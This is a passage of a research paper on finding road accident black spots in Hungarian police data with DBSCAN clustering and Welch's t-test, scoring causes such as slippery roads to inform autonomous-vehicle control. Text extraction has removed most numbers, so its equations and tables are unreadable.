hazard of accidents is significantly higher here. it is usually accepted by researchers that the number of accidents in a given area (section) of the road network fits the poisson distribution. a special feature of road accident distribution is that the number of accidents is relatively low (compared to the size of the road network), and the variance is high. therefore, the volatility of the accident number is very high, which means that a given cluster where the number of accidents is above the average is not inevitably a hot spot. the list given by the previous methods needs further examination to find the real hazardous sites. at this point, the methodology of this paper significantly differs from the work of road safety engineers. their objective is to find hazardous sites and take the appropriate actions to decrease the probability of further accidents. they must select the sites having the largest safety potential where the best cost-effective actions can be taken to decrease the number and severity of accidents. it is a very complex procedure based on the data of historical accidents, the expected number of accidents, the environmental conditions and the cost/expected benefits of different safety actions. contrary to this, the objective of a self-driven car is not the elimination of road safety problems. as an ordinary participant of traffic, it has no chance to make the road network better. nevertheless, as a passive participant, it should be able to localize the problematic areas, analyze these, and take the necessary preliminary steps to avoid further accidents. another difference between the methods of these fields is that from the perspective of road safety engineers, it is not necessary that the accidents of a given black spot have any special patterns or common characteristics. for the self-driven car, the localization of high-risk areas where the number of accidents is significantly higher than expected is szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ not enough because this fact does not help to take the appropriate preliminary steps. this is the reason why this paper focuses on the identification of accident reasons. the result of this further investigation can be one of the following: � if it is not possible to identify any unexpected pattern in the accident attributes then the cluster cannot be considered as an accident black spot. the high number of accidents is just a coincidence and there are no suggestions to avoid further crashes. � in contrast, if there is a special pattern in the accident attributes then this cluster has the potential to decrease the probability of further crashes. these reasons for similar accidents would be related to the road network, weather, lighting conditions or human errors (drivers and pedestrians). in the second case, the knowledge of this special pattern (the common reasons for accidents in the same cluster) can be essential. it is presumable that it is possible to avoid accidents caused by the car itself. for example, if it is visible from the accident database that the number of accidents caused by slippery road is significantly higher than expected in a given area, the self-driven car should decrease the speed or change its trajectory to reduce the probability of this event. however, it is also worth noting that the preliminary actions can be very useful to decrease the probability of accidents caused by other drivers or pedestrians. for example, if the historical accident data contains patterns that the number of accidents caused by pedestrians is higher than expected, then the self-driven car would proactively try to decrease this negative potential using some type of visual or auditory warning or decreasing speed. deducing the environmental reasons for accidents accident databases usually contain certain taxonomy for accident types. these are usually structured classes of specific events and reasons, and scene investigators must classify each accident into one of these categories, which is very important statistical information. this method has several limitations because it is rare when the occurrence of an accident originates in one specific reason. usually, multiple reasons, forming a complex structure, cause an accident. for example, the investigator codes the accident as a type of “catching-up accident”, but this does not give any information about why the accident occurs. it is also typical that most of the accidents in the hungarian road network are caused by “incorrect choice of speed”. however, it is obvious that not just the speeding itself was the triggering reason for these accidents. there should be other factors (besides, it is unarguable that speeding increases the effects of other factors and makes certain accidents unavoidable). based on these experiences, this paper does not try to assign all accidents to mutually exclusive accident reason classes. contrarily, the proposed method defines several potential accident reasons, which are not mutually exclusive. these factors can be complementary and having different weights and roles in the occurrence of the accident. only the reasons with potential preventive operations are discussed because these have valuable information for the self-driven car. szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed method is based on the following consecutive steps: . all known accidents are analyzed by all possible accident reasons, and a score value is assigned to the accident showing how much the accident is affected by a given factor. . the distribution of these score values is approximated by the examination of all known accidents. . based on the result of the previously presented dbscan algorithm, the distribution of these score values is also calculated for each black spot candidate. . the distributions for all accidents and a given black spot are compared. if the distribution of a given factor is significantly differing (to the positive direction), the cluster is marked as a hazardous area for the given factor. the independent accident reason factors, like “slippery road”, “bad visibility”, “careless pedestrians”, etc. are defined as r , r ,…, rn, where n is the number of these. as discussed previously, these reasons are not stored directly in the database but can be inferred from the general attributes of accidents. a scoring table is used for this purpose: the weights of the i-th accident factor ( ≤ i ≤ n) is stored as wi; where wiattr = value shows the score for the ri accident reason when the attr attribute equals to value. accordingly, the cumulative score of the ri reason for the x accident is eq. ( ): siðxÞ¼ x attr aðxÞ wiattr¼x:attr ( ) where si(x) is the score value of the ri reason for accident x. the x.y corresponds to the value of the specific y attribute of the x accident, and aðxÞcontains all the available known attributes of x. it is also possible to calculate the same value, not just for an accident but also for all accidents of a black spot candidate. the hi(c) set contains all the si(x) score values for all x accidents in the c cluster as visible in eq. ( ): hiðcÞ¼ fsiðxÞjx cg ( ) distribution of accident scores as a further step, it is necessary to determine that there is any significant reason which proves that the c set is a real hot spot or not. for a well-established decision, it is necessary to analyze all the accidents in the database to determine the main characteristics of the distributions of all r reasons. based on these results, it is possible to compare the distributions of hi(c) values for the examined c hot spot candidate and the reference ĥi values for the whole accident database (d) for a given ri reason eq. ( ). ĥi ¼fsiðxÞjx dg ( ) if the distributions of hi(c) and ĥi are the same, it is assumable that the ri reason has no significant role in the accumulation of accidents. otherwise, if these distributions differ szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as the number ri score values are higher in hi(c) than in ĥi, there may be some cause/causal relationship between them. hypothesis tests can show if the mean value of a given accident reason score (ri) in a given cluster is higher than the same mean for all accidents in the database. the used alternative hypothesis states that the mean score of the cluster minus the mean score of the whole population is greater than zero eq. ( ). the null hypothesis covers all other possible outcomes eq. ( ). h=j� : mc �md � ( ) h=k� : mc �md . ( ) where: � μc is the mean score value for the black spot candidate; � μd is the mean score value for all accidents in the database (full population). this article proposes the application of welch’s t-test, which is a two-sample location test used to test the hypothesis that the means of two populations are equal (like the popular student’s t-test, but welch’s test is more reliable when sample sizes are significantly different and the variances are also unequal). the welch’s test assumes that both populations have normal distributions. nevertheless, in the case of moderately large samples and application of the one-tailed test, the t-tests are relatively robust to moderate violations of the normality assumption. in this case, the populations are large enough (the full population contains thousands of accidents and black spots also contain several accidents), and it also holds that the one-tailed test is the appropriate method because we are looking for clusters where the mean is significantly higher than in the entire population. ahad & yahaya ( ) shows that welch’s test can cause type i errors when the variances of the two populations differ and distributions are non-normal. in this case, the variances are similar, and type i errors are acceptable (some identified black spot candidates may not be real black spots). according to welch’s method, the statistic t value is given by eq. ( ). t ¼ x �x ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi v n þ v n r ( ) where: � x is the mean of the first sample; � x is the mean of the second sample; � v is the variance of the first sample; � v is the variance of the second sample; � n is the size of the first sample; � n is the size of the second sample. szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the degree of freedom (v) is calculated by eq. ( ) v ¼ � v n þ v n � v n ðn � Þ þ v n ðn � Þ ( ) based on the previously calculated t and v values, the t-distribution can be used to determine the probability (p). the one-tailed test is applied because it will answer the question that the mean of the cluster is significantly higher than the mean of the entire population. based on p and a previously defined level of significance (a) it is possible to reject or not the null hypothesis. in the case of rejection, it can be assumed that the examined accident reason is related to the accidents as one of the possible causal factors. if the null hypothesis cannot be rejected, there is no evidence for this. scoring factors the practical evaluation presented by this paper focuses on one specific accident reason (n = ) the slippery road condition factor (r ). the used accident database contains more than two hundred fields, in four categories: � general accident attributes (date and time, location, nature, etc.); � general environmental attributes (weather conditions, visibility, etc.); � data about participants (was it a vehicle or pedestrian, speed, direction, etc.); � data about injured persons (age of the injured person, etc.). weighting tables have been developed to estimate the effect of a given accident reason factor on the occurrence of the accident. it is possible to distinguish the following three type of accident properties, focusing on the slippery road condition accident factor: � some fields directly contain information about the examined factor. in this case, the “road surface” property (abbreviated as roadsrf) of an accident has an option of “ -oily, slippery”. this is taken as the basis for further weights; the score value of this attribute is . (w roadsrf = = . ), showing that the accident is highly affected by the slippery road condition factor. it is worth noting that it is not efficient making a binary decision about the examined factor based on this value because there are other values (“ -snowy”, “ -another staining”) having similar effects. this is reflected in the weight values. � in some cases, there are no such direct fields, but it is possible to deduce information about a given factor from the already existing data. for example, in the case of the slippery road condition factor, the weather conditions (wthr property in the database) can help this process. in these cases, the score values assigned to different weather condition cases show an estimation of how much the given factor affected the occurrence of the accident. in the case of snowing (“ -snowy”), it would be higher szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (w wthr = = . ) than for ideal conditions like “ -sunny” (w wthr = = ). it is also considered that in the case of accident nature “ -slipping, carving, overturning on the road”, the slippery road factor influenced the results (w accnat = = . ) � the last group contains the fields without any relation to the examined factor. for example, fields like “age of the driver” do not affect the results. the weights for all values of these fields are consequently zero. the supplemental file “scoring tables” contains the given weight values for the affected fields. weight values are based on a comprehensive literature review from the fields of road safety and road friction measurements (wallman & Åström, ; andersson et al., ; sokolovskij, ; colomb, duthon & laukkanen, ). however, some of the values are affected by the subjective experiments of the authors. it should take some further research to determine the most efficient weights. results accident database this paper uses the official road accident database of hungary, where data regarding accidents with personal injury are collected by the police. after some conversion and corrections, this dataset is handled by the central statistics department. the completeness of the database is ensured by legislation, and participants of public road accidents with personal injury are obliged to report it to the police. a police officer starts the data collection on the spot by recording the most relevant data about the location and the main attributes of the accidents (participants, casualties, etc.). after days, it is possible to refine the final injury level for all participants. after that finalization step, the central statistics department collects and rechecks all records. road safety engineers and researchers can use this database for their work. the evaluation part of this paper is based on the accidents of this database from january to december . it contains , accidents with personal injury classified into three categories: fatal, serious and slight. there are no accidents in the database without personal injury. because of the high number of accidents and high computational demand of the clustering algorithm, this paper deals with two counties of hungary: accidents of “győr-moson-sopron” county was used to find the optimal parameters of the algorithm and “heves” county was used as a control dataset. dbscan clustering the input database for the clustering was the personal injury accidents of a given county of hungary (“győr-moson-sopron” county). this experiment was performed twice at two consecutive time intervals to measure the robustness of the method. the examined t interval contains the accidents which occurred in january – december . and the t̂ validation interval was january – december . the number of accidents was , in the t interval (the d set contains these accidents) and , in the t̂ interval (the d̂ set contains these accidents). szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the hot spot search phase, the following dbscan parameters were used: � ε value: m; � minimum accident count: five accidents; � minimum accident density: . accident/m . the result of this raw dbscan clustering method was black spot candidates in the t interval and black spot candidates in the t̂ interval. statistical test unlike traditional black spot searching methods, the next step is not the calculation of some safety potential index, but the determination of the different accident reason factors using the scoring method presented in section. considering the r slippery road condition factor, the s (x) value is calculated for all x accidents. most of these are not related to a slippery road surface reasons; so, s value for these is . as a prerequisite for the welch-test, a population of si(y) values is generated where y stands for all accidents in the database. the main parameters of this sample are: � number of items (n ): , � mean (x ): . � variance (v ): . it is possible to calculate these values for all of them, iterating the overall black spot candidates. based on the whole population comparison and the black spot candidates, the welch-test was applied to get the statistical result values. according to the welch-test, it is possible to use the student distribution with these parameters and the given level of significance (a = . ) to reject the null hypothesis or not. table shows the black spot candidates of the t interval where the null hypothesis was rejected because the mean of the r score for the given black spot candidate was significantly higher than the expected average. it can be assumed that these black spots are affected by the examined r factor. figure shows the environment and the accidents of the first black spot from this list. as is visible in the satellite image, it is a part of a long straight road; consequently, there is no reason for the autonomous car to decrease its speed. from the historical database, table contains detailed information about the accidents. as is visible, there is a high number of accidents affected by one or more slippery road-related attributes. this pattern table accident black spots where the null hypothesis was rejected. # location count mean variance prob. lat . /lon . . . . lat . /lon . . . . lat . /lon . . . . lat . /lon . . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ significantly differs from the expectations; hence, there should be some environmental issues at this location. the examination and elimination of these reasons is the task of road safety experts (orosz et al., ). nevertheless, until then, it is worth taking preventive steps to decrease the chance of further accidents. the autonomous vehicle should adapt its control to this situation (speed reduction, using safer trajectory, etc.). discussion there is not any generally accepted method for the evaluation of black spots because there is not an exact definition for these. based on real-world accident data, there is not any figure road accidents of the black spot located at lat . /lon . . map data @ google, satellite images @ cnes/airbus, geoimage austria, maxar technologies. full-size doi: . /peerj-cs. /fig- table accidents of the black spot located at lat . / lon . . time latitude longitude outcome surface weather accident nature . . : . . light wet sunny track leaving . . : . . hard normal sunny track leaving . . : . . light wet rainy track leaving . . : . . hard wet rainy track leaving . . : . . hard wet rainy track leaving . . : . . light wet overcast frontal crash . . : . . light wet sunny slipping, carving . . : . . hard wet overcast track leaving szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ list of real black spots. so, the widely accepted confusion table-based methods are not usable here (assigning the clusters into true-positive, false-positive, true-negative, false- negative classes and calculating the common measurements like accuracy, recall, etc.). therefore, it is necessary to evaluate these results based on the general characteristics of these locations. the accident density of black spots is significantly higher than the average; though, this is just a necessary condition but not sufficient for validity. because of the high volatility of accidents, the regression to the mean effect can distort the results. it is a well-known statistical phenomenon that roads with a high number of road accidents in a particular period are likely to have fewer during the consecutive period just because of the random fluctuations in crash numbers. in the case of real black spots, the high number of accidents is permanent. thus, it should be a good evaluation technique to check the number of accidents of the consecutive validation time interval inside the clusters identified in the t interval. there are specific tests for this purpose introduced by cheng & washington ( ) used by various article (montella, ): site consistency tests, method consistency tests, and the total rank differences test. since these are developed for black spot searching methods based on road intervals, it was necessary to adapt them to use spatial coordinates and black spot regions. the input series for all tests were the result of the previous black spot identification process, as � ci is the i-th cluster identified in the d database ( ≤ i ≤ n where n is the number of identified black spots in the t interval); � ĉi is the i-th cluster identified in the d̂ database ( � i � n̂ where n̂ is the number of identified black spots in the t̂ interval). site consistency test this test assumes that any site identified as a black spot in the t time period should also reveal high risk in the subsequent t̂ time period. let p(c) the convex boundary polygon of the c cluster given by the algorithm presented in section, and p is the union of these regions identified in the t time period ( ). � ¼ [n i¼ �ðciÞ ( ) as the next step, we collect all accidents for the consecutive t̂ time period, which are inside the clusters identified by the prior t time period. the t attribute shows the number of these accidents divided by the summarized area of these clusters. thus, this is the accident density of these clusters in the consecutive time period eq. ( ). t ¼ jfx d̂jx inside �gjpn i¼ aðciÞ ( ) szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accident reason factor consistency test as this paper goes further, revealing the accident reason factors, it is also worth checking if the accidents in the t̂ time period inside the region identified by the t time period have the same attributes or not. this leads to the introduction of the t′ value, which shows the average score value for these accidents eq. ( ). t ¼ p x d̂ � s ðxÞ; if x inside � ; else jfx d̂jx inside �gj ( ) method consistency test it is also assumable that a black spot area identified in the t time period will also be identified as black spot in the consecutive t̂ time period. a given black spot searching method can be considered consistent if the number of a black spots identified in both periods is large. meanwhile, that of black spots identified only in one of the examined periods is small. it is possible to use eq. ( ) to calculate this method consistency: t ¼ jfc ; c ; . . . cng\fĉ ; ĉ ; . . . ĉn̂gj jfc ; c ; . . . cng fĉ ; ĉ ; . . . ĉn̂gj ( ) where t is the ratio of the number of clusters existing in both search results and the number of clusters given by only the search in t or only in t̂ time period (△ stands for the symmetric difference of sets). a pair of clusters from the t and t̂ period considered identical if the distance between these is less than m. rank difference test the rank difference test is based on black spots identified in both the t and t̂ periods. the black spots of both periods are sorted by accident density, and the rank difference test shows the difference in the positions of the same cluster in the two lists. the smaller the value, the more consistent the examined method is, because the sequence of clusters is similar. large numbers shows that the examined method was able to identify the same black spot in both intervals but with a different severity related to each other. let o and ô the sequences of black spots identified in both periods (both sequences contain the items of thefc ; c ; . . . cng\fĉ ; ĉ ; . . . ĉn̂g set) ordered by accident density in the t time period (o) and in the t̂ time period (ô). the t will show the rank difference of the examined method eq. ( ). obviously joj ¼ jôj. t ¼ p c o jrankðc; oÞ�rankðc; ôÞj joj ( ) where rank(x, y) is the rank of the x black spot in the y sequence. evaluation results first, the proposed method was compared to the traditional sliding window method (sw) using dynamic window length. the minimal window length parameter was m, the szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ minimal accident number was , and the minimal accident density was . accidents/m. as a further step, the novel method was also compared to the raw dbscan based clustering (without the accident factor scoring). the parameters of this were the same as presented above. the proposed method is presented in the comparison under the darf (dbscan with accident reason factor determination) name. table shows the overall results for “győr-moson-sopron” county. as visible, the number of black spots recognized by the darf method is significantly less than by its alternatives. it was expected because the sw and dbscan methods list all clusters where the accident density is higher than a given threshold. in contrast, the darf method results in only black spots affected by the r accident factor. the difference between the sw and dbscan is also significant and is caused by the fact that the sw uses road name + road section positioning which is not available in built-up areas. in comparison, the dbscan method is based on gps coordinates and can find the black spots of municipal roads (which is one advantage of this approach). the t result is similar in the case of dbscan and darf methods and it is significantly less in the case of sw. the t results are almost the same for all algorithms. the third general metric shows that the proposed method performs very well on the rank difference test. however, it is worth noting that the number of black spots is significantly less in this case, which can be an advantage. the t′ metric shows the real strength of the proposed method. as expected, black spots identified by the sw and dbscan contain a mixture of various accidents. consequently, the average of the r score is near to the mean of the population ( . and . compared to . ). contrary to this, the score number for the accidents of the t̂ time interval placed inside the clusters located by the data of the t interval is . , which is significantly higher than the average. these results confirm that the proposed method has very similar characteristics to the already existing methods. the slightly lower t value shows that as a raw black spot searching algorithm, it is not as robust as the alternatives. nonetheless, the t′ result shows table results of the comparison of the sw, dbscan, and darf methods based on the road slippery condition. precision is the ratio of the number of confirmed black spots (identified in both intervals) and the number of all black spots (identified at least in one of the intervals). results are based on the personal injury accidents occured in “győr-moson-sopron” county. value sw dbscan darf bs identified in both t and t̂ bs identified in t but not in t̂ bs identified in t̂ but not in t precision . % . % . % t test result (accidents/m) . . . t′ test result . . . t test result . . . t test result . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that it is satisfactory for our purpose. it can localize areas when the expected number of accidents with given accident reasons is significantly higher than the average. table shows the same values for another county (“heves”) as a control dataset to check the robustness of the method. as visible, the main characteristics of the results are very similar. in this case, the t and t results are better compared to the alternatives. however, the t′ value is slightly lower, but still significantly higher than the population average. conclusions this work presents a novel, fully automated method updating autonomous vehicles concerning potential road risk factors. the method is based on the dbscan data-mining algorithm, which can localize black spot candidates where the number of accidents is greater than expected. it has several advantages to the traditional sliding window method, especially in built-up areas and accidents occurred at junctions. beyond the traditional road safety engineering work, an additional processing step was also introduced, making assumptions about the main accident reasons. all possible reasons (road slippery, pedestrian issues, etc.) should be checked one-by-one, assigning score values to all accidents. the proposed method considers the distribution of these score values for the full population (all accidents of the given county) and each black spot candidate. using hypotheses tests (one-tailed welch-test), it is possible to select clusters in which the mean of the score values is significantly higher than the expected value (calculated by statistical methods based on the entire accident database). these can be considered as black spots affected by the given factor. the output of this process is a sequence of risky locations on the public road network and a prediction concerning the accident reasons. these would be the base of further research suggesting automatic preventive steps to autonomous vehicles. this dataset can be useful in the route planning phase (try to avoid black spots) and in the traveling phase (take preventive steps when approaching dangerous locations) (alonso et al., ). this knowledge would decrease the number and seriousness of public road accidents. table results of the comparison of the sw, dbscan, and darf methods based on the road slippery condition. precision is the ratio of the number of confirmed black spots (identified in both intervals) and the number of all black spots (identified at least in one of the intervals). results are based on the personal injury accidents are occured in “heves” county. value sw dbscan darf bs identified in both t and t̂ bs identified in t but not in t̂ bs identified in t̂ but not in t precision . % . % . % t test result (accidents/m) . . . t′ test result . . . t test result . . . t test result . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as a limitation, it is worth noting that the proposed method would result in false positive alarms. fortunately, these results are used by autonomous vehicles; therefore, the consequences are usually minor inconveniences (decreasing the speed, etc.) compared to the traditional road safety investigations, where the manual revision is essential. it is also worth seeing that our method is based only on local historical data resulting in problems typical of traditional statistical black spot searching methods (high variation compared to the expected value). it would be worth developing a hybrid method based on the empirical bayes method, which achieves superior control for random variation. the next step of this research project will be the development of these preventive steps. the previously acquired information should be built into the control of the self-driven vehicle to fine-tune its strategy of movement to avoid all predictable risky situations. for example, if the presented method predicts high probability of pedestrian accidents, the car should increase the engine voice volume; in the case of a high chance of frontal accidents, it is worth increasing the power of the headlights; and obviously, decreasing the speed near any of the dangerous locations may decrease the seriousness of most accidents. building an expert system to give similar advice based on the historical data should be the next step of this project. another direction of further development is to make the method more sensitive to real-time environmental conditions. for example, if the autonomous car has to plan a route at night in wet weather, then it should pay more attention to historical accidents that have occurred under similar conditions. this also confirms the fact that it is necessary to make simple and fully automatic algorithms for this purpose to make the fast recalculations available. as another further development, an artificial intelligence based approach should be used to extend the database to solve the problems raised by the limitations of the dataset. acknowledgements the authors would like to thank domokos jankó for his support and novel ideas about the topic. rest in peace our friend. additional information and declarations funding the research presented in this paper was carried out as part of the efop- . . - - - project in the framework of the new széchenyi plan. the completion of this project is funded by the european union and co-financed by the european social fund. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: new széchenyi plan: efop- . . - - - . european union and european social fund. szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests sándor szénási is an academic editor for peerj. author contributions � sándor szénási conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahad na, yahaya sss. . sensitivity analysis of welch’s t-test. aip conference proceedings (february ): – . alonso f, alonso m, esteban c, useche sa. . knowledge of the concepts of black spot, grey spot and high accident concentration sections among drivers. science publishing group ( ): – . anderson tk. . kernel density estimation and k-means clustering to profile road accident hotspots. accident analysis & prevention ( ): – doi . /j.aap. . . . andersson m, bruzelius f, casselgren j, gäfvert m, hjort m, hultén j, håbring f, klomp m, olsson g, sjödahl m, svendenius j, woxneryd s, wälivaara b. . road friction estimation ivss project report. available at https://research.chalmers.se/en/publication/ . bálint a, fagerlind h, kullgren a. . a test-based method for the assessment of pre-crash warning and braking systems. accident analysis & prevention : – doi . /j.aap. . . . bíl m, andrášik r, janoška z. . identification of hazardous road locations of traffic accidents by means of kernel density estimation and cluster significance evaluation. accident analysis & prevention ( ): – doi . /j.aap. . . . carsten om, tate fn. . intelligent speed adaptation: accident savings and cost-benefit analysis. accident analysis & prevention ( ): – doi . /j.aap. . . . chatterjee k, hounsell nb, firmin pe, bonsall pw. . driver response to variable message sign information in london. transportation research part c: emerging technologies ( ): – doi . /s - x( ) - . cheng w, washington sp. . experimental evaluation of hotspot identification methods. accident analysis & prevention ( ): – doi . /j.aap. . . . colomb m, duthon p, laukkanen s. . characteristics of adverse weather conditions. in: dense. brussels: cer. delorme r, lassarre s. . a new theory of complexity for safety research—the case of the long-lasting gap in road safety outcomes between france and great britain. safety science : – doi . /j.ssci. . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.aap. . . https://research.chalmers.se/en/publication/ http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /s - x( ) - http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.ssci. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ elvik r. . a survey of operational definitions of hazardous road locations in some european countries. accident analysis & prevention ( ): – doi . /j.aap. . . . flahaut b, mouchart m, martin es, thomas i. . the local spatial autocorrelation and the kernel method for identifying black zones. accident analysis & prevention ( ): – doi . /s - ( ) - . geurts k, wets g, brijs t, vanhoof k, karlis d. . ranking and selecting dangerous crash locations: correcting for the number of passengers and bayesian ranking plots. journal of safety research ( ): – doi . /j.jsr. . . . ghadi m, török Á. . a comparative analysis of black spot identification methods and road accident segmentation methods. accident analysis & prevention : – doi . /j.aap. . . . harper cd, hendrickson ct, samaras c. . cost and benefit estimates of partially-automated vehicle collision avoidance technologies. accident analysis & prevention : – doi . /j.aap. . . . hegyi p, borsos a, koren c. . searching possible accident black spot locations with accident analysis and gis software based on gps coordinates. pollack periodica ( ): – doi . / . . . . . hossain m, abdel-aty m, quddus ma, muromachi y, sadeek sn. . real-time crash prediction models: state-of-the-art, design pathways and ubiquitous requirements. accident analysis & prevention : – doi . /j.aap. . . . jermakian js. . crash avoidance potential of four passenger vehicle technologies. accident analysis & prevention ( ): – doi . /j.aap. . . . kertesz g, felde i. . one-shot re-identification using image projections in deep triplet convolutional network. in: sose, —ieee th international conference of system of systems engineering, proceedings. piscataway: ieee, – . lee s, lee y. . calculation method for sliding-window length: a traffic accident frequency case study. easter asia society for trasportation studies : – . lenard j, badea-romero a, danton r. . typical pedestrian accident scenarios for the development of autonomous emergency braking test protocols. accident analysis & prevention ( ): – doi . /j.aap. . . . mauro r, de luca m, dell’acqua g. . using a k-means clustering algorithm to examine patterns of vehicle crashes in before-after analysis. modern applied science ( ): – . montella a. . a comparative analysis of hotspot identification methods. accident analysis & prevention ( ): – doi . /j.aap. . . . montella a, andreassen d, tarko ap, turner s, mauriello f, imbriani ll, romero ma. . crash databases in australasia, the european union, and the united states. transportation research record: journal of the transportation research board ( ): – doi . / - . murray w, white j, ison s. . work-related road safety: a case study of roche australia. safety science ( ): – doi . /j.ssci. . . . nitsche p, thomas p, stuetz r, welsh r. . pre-crash scenarios at road junctions: a clustering method for car crash data. accident analysis & prevention : – doi . /j.aap. . . . orosz g, mocsári t, borsos a, koren c. . evaluation of low-cost safety measures on the hungarian national road network. in: proceedings of the xxvth world road congress, seoul: world road association, – . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jsr. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . / . . . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . / - http://dx.doi.org/ . /j.ssci. . . http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rosén e, källhammer je, eriksson d, nentwich m, fredriksson r, smith k. . pedestrian injury mitigation by autonomous braking. accident analysis & prevention ( ): – doi . /j.aap. . . . sokolovskij e. . automobile braking and traction characteristics on the different road surfaces. transport ( ): – doi . / . . . szénási s, jankó d. . internet-based decision-support system in the field of traffic safety on public road networks. in: th european transport conference. budapest, – . toran a, moridpour s. . identifying crash black spots in melbourne road network using kernel density estimation in gis. in: road safety and simulation. wallman c-g, Åström h. . friction measurement methods and the correlation between road friction and traffic safety: a literature review. available at https://books.google.hu/books? id=vl bhqaacaaj. yu h, liu p, chen j, wang h. . comparative analysis of the spatial analysis methods for hotspot identification. accident analysis & prevention ( ): – doi . /j.aap. . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . / . . https://books.google.hu/books?id=vl bhqaacaaj https://books.google.hu/books?id=vl bhqaacaaj http://dx.doi.org/ . /j.aap. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. analysis of historical road accident data supporting autonomous vehicle control strategies introduction background materials and methods results discussion conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck 